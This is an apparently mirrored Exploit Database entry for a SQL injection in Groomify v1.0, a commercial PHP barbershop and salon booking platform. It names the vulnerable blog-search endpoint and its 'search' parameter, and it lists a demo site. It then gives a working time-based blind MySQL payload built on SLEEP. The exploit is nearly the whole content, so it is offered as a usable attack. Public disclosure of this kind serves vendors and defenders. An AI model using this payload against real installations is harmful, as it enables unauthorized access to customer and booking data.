Groomify v1.0 – SQL Injection

• Exploit Database
• 17 阅读

• 作者： Ahmet Ümit BAYRAM
  日期： 2023-06-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51526/

• # Exploit Title: Groomify v1.0 - SQL Injection
  # Date: 2023-06-17
  # Exploit Author: Ahmet Ümit BAYRAM
  # Vendor:
  https://codecanyon.net/item/groomify-barbershop-salon-spa-booking-and-ecommerce-platform/45808114#
  # Demo Site: https://script.bugfinder.net/groomify
  # Tested on: Kali Linux
  # CVE: N/A
  
  
  ### Vulnerable URL ###
  
  https://localhost/groomify/blog-search?search=payload
  
  
  ### Parameter & Payloads ###
  
  Parameter: search (GET)
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: search=deneme' AND (SELECT 1642 FROM (SELECT(SLEEP(5)))Xppf)
  AND 'rszk'='rszk